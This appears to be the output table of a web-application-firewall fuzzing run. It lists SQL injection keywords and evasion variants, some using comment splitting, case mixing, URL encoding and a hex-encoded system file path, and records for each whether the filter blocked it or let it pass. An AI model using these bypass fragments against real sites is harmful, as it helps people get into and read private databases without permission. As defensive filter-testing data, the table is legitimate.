| Fuzz | HTTP Status | Content-Length | Expected | Output | Working |
|---|---|---|---|---|---|
| 123<234 | 200 | 9779 | 123<234 | type ht | Probably |
| 9928!=1239 | 200 | 9779 | 9928!=1239 | type html | Probably |
| abc' | 200 | 9779 | abc' | type | Probably |
| abc" | 200 | 9779 | abc" | type | Probably |
| or | 200 | 9779 | or | ty | Probably |
| and | 200 | 9779 | and | typ | Probably |
| '' | 200 | 9779 | '' | ty | Probably |
| 'abc' | 200 | 9779 | 'abc' | type | Probably |
| abc' -- | 403 | - | abc' -- | - | No |
| = | 200 | 9779 | = | t | Probably |
| >= | 200 | 9779 | >= | ty | Probably |
| <= | 200 | 9779 | <= | ty | Probably |
| between | 200 | 9779 | between | type ht | Probably |
| like | 200 | 9779 | like | type | Probably |
| order | 200 | 9779 | order | type | Probably |
| by | 200 | 9779 | by | ty | Probably |
| ORDER/**/BY | 200 | 9779 | ORDER/**/BY | type html p | Probably |
| having | 200 | 9779 | having | type h | Probably |
| || | 200 | 9779 | || | ty | Probably |
| && | 200 | 9779 | && | ty | Probably |
| # | 200 | 9779 | # | t | Probably |
| /* | 200 | 9779 | /* | ty | Probably |
| union | 200 | 9779 | union | type | Probably |
| uNioN | 200 | 9779 | uNioN | type | Probably |
| uN/**/ioN | 200 | 9779 | uN/**/ioN | type html | Probably |
| select | 200 | 9779 | select | type h | Probably |
| seLeCt | 200 | 9779 | seLeCt | type h | Probably |
| seL/**/eCt | 200 | 9779 | seL/**/eCt | type html | Probably |
| union select | 200 | 9779 | union select | type html pu | Probably |
| union/**/select | 200 | 9779 | union/**/select | type html publi | Probably |
| uNion(sElect) | 200 | 9779 | uNion(sElect) | type html pub | Probably |
| union all select | 200 | 9779 | union all select | type html public | Probably |
| union/**/all/**/select | 200 | 9779 | union/**/all/**/select | type html public "-//w | Probably |
| uNion all(sElect) | 200 | 9779 | uNion all(sElect) | type html public | Probably |
| insert | 200 | 9779 | insert | type h | Probably |
| values | 200 | 9779 | values | type h | Probably |
| update | 200 | 9779 | update | type h | Probably |
| delete | 200 | 9779 | delete | type h | Probably |
| waitfor() | 200 | 9779 | waitfor() | type html | Probably |
| waitfor | 200 | 9779 | waitfor | type ht | Probably |
| sleep(2) | 200 | 9779 | sleep(2) | type htm | Probably |
| WAITFOR DELAY | 200 | 9779 | WAITFOR DELAY | type html pub | Probably |
| benchmark() | 200 | 9779 | benchmark() | type html p | Probably |
| information_schema | 200 | 9779 | information_schema | type html public " | Probably |
| table_name | 200 | 9779 | table_name | type html | Probably |
| column_name | 200 | 9779 | column_name | type html p | Probably |
| if | 200 | 9779 | if | ty | Probably |
| else | 200 | 9779 | else | type | Probably |
| IF() select | 200 | 9779 | IF() select | type html p | Probably |
| case() | 200 | 9779 | case() | type h | Probably |
| limit | 200 | 9779 | limit | type | Probably |
| char() | 200 | 9779 | char() | type h | Probably |
| cast() | 200 | 9779 | cast() | type h | Probably |
| convert() | 200 | 9779 | convert() | type html | Probably |
| isnull() | 200 | 9779 | isnull() | type htm | Probably |
| substring() | 200 | 9779 | substring() | type html p | Probably |
| concat() | 200 | 9779 | concat() | type htm | Probably |
| hex() | 200 | 9779 | hex() | type | Probably |
| unhex() | 200 | 9779 | unhex() | type ht | Probably |
| avg() | 200 | 9779 | avg() | type | Probably |
| count() | 200 | 9779 | count() | type ht | Probably |
| max() | 200 | 9779 | max() | type | Probably |
| min() | 200 | 9779 | min() | type | Probably |
| sum() | 200 | 9779 | sum() | type | Probably |
| JOIN | 200 | 9779 | JOIN | type | Probably |
| @@version | 200 | 9779 | @@version | type html | Probably |
| user | 200 | 9779 | user | type | Probably |
| drop | 200 | 9779 | drop | type | Probably |
| load_file() | 200 | 9779 | load_file() | type html p | Probably |
| extractvalue() | 200 | 9779 | extractvalue() | type html publ | Probably |
| 0x633A5C626F6F742E696E69 | 200 | 9779 | 0x633A5C626F6F742E696E69 | type html public "-//w3c | Probably |
| %55nion(%53elect 1,2,3) | 200 | 9779 | %55nion(%53elect 1,2,3) | type html public "-//w3 | Probably |
| uni%0bon+se%0blect | 200 | 9779 | union select | type html pu | Probably |
| REVERSE(noinu) REVERSE(tceles) | 200 | 9779 | REVERSE(noinu) REVERSE(tceles) | type html public "-//w3c//dtd | Probably |
| /*--*/union/*--*/select/*--*/ | 403 | - | /*--*/union/*--*/select/*--*/ | - | No |
| union distinct select | 403 | - | union distinct select | - | No |
| uniOn distiNct sElect | 403 | - | uniOn distiNct sElect | - | No |
| <!-- | 200 | 9779 | <!-- | type | Probably |
| information_schema.tables | 200 | 9779 | information_schema.tables | type html public "-//w3c/ | Probably |
| information_schema.columns | 200 | 9779 | information_schema.columns | type html public "-//w3c// | Probably |
| user() | 200 | 9779 | user() | type h | Probably |
| system_user() | 200 | 9779 | system_user() | type html pub | Probably |
| information_schema.schemata | 200 | 9779 | information_schema.schemata | type html public "-//w3c//d | Probably |
| table_schema | 200 | 9779 | table_schema | type html pu | Probably |
| offset | 200 | 9779 | offset | type h | Probably |
| distinct | 200 | 9779 | distinct | type htm | Probably |
| @@hostname | 200 | 9779 | @@hostname | type html | Probably |
| @@datadir | 200 | 9779 | @@datadir | type html | Probably |
| version() | 200 | 9779 | version() | type html | Probably |
| exec() | 200 | 9779 | exec() | type h | Probably |